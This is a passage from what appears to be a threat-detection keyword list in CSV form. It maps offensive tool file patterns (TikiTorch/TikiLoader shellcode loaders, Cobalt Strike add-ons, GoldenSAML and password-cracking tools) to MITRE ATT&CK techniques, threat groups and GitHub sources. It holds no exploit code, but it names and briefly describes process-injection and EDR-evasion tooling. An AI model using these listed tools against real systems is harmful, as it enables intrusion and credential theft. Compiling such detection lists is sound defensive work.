Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease.modules.*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*TicketToHashcat.py*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*TicketToHashcat.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Tiger-192.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*tijme/kernel-mii*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*TikiLoader*Hollower*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader.*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*TikiLoader.dll*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader.dll*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*TikiLoader.Injector*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader\TikiLoader*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawn.dll*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawn.exe*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawn.ps1*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnAs*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnAsAdmin*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnElevated*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnWOppid*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnWppid*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiTorch.exe*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiVader.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety 